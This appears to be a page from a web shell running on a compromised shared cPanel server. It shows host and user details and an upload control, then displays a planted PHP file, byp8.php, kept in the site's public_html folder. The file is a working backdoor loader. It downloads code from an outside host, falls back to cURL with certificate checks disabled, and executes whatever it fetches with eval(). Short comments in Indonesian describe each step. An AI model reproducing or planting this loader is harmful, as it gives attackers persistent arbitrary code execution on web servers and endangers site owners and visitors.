HEX
Server: Apache
System: Linux srv10.cpanelhost.cl 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
User: cco26461 (4967)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home6/cco26461/public_html/byp8.php
<?php
$url = "https://stepmomhub.com/5.txt";

// Ambil isi dari URL menggunakan file_get_contents
$code = @file_get_contents($url);

// Jika gagal ambil dengan file_get_contents, coba dengan cURL
if ($code === false) {
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_USERAGENT => 'Mozilla/5.0',
        CURLOPT_SSL_VERIFYPEER => false,
    ]);
    $code = curl_exec($ch);
    curl_close($ch);
}

// Jalankan isi kode jika berhasil diambil
if ($code !== false) {
    eval("?>".$code);
} else {
    echo "Gagal mengambil konten dari URL.";
}
?>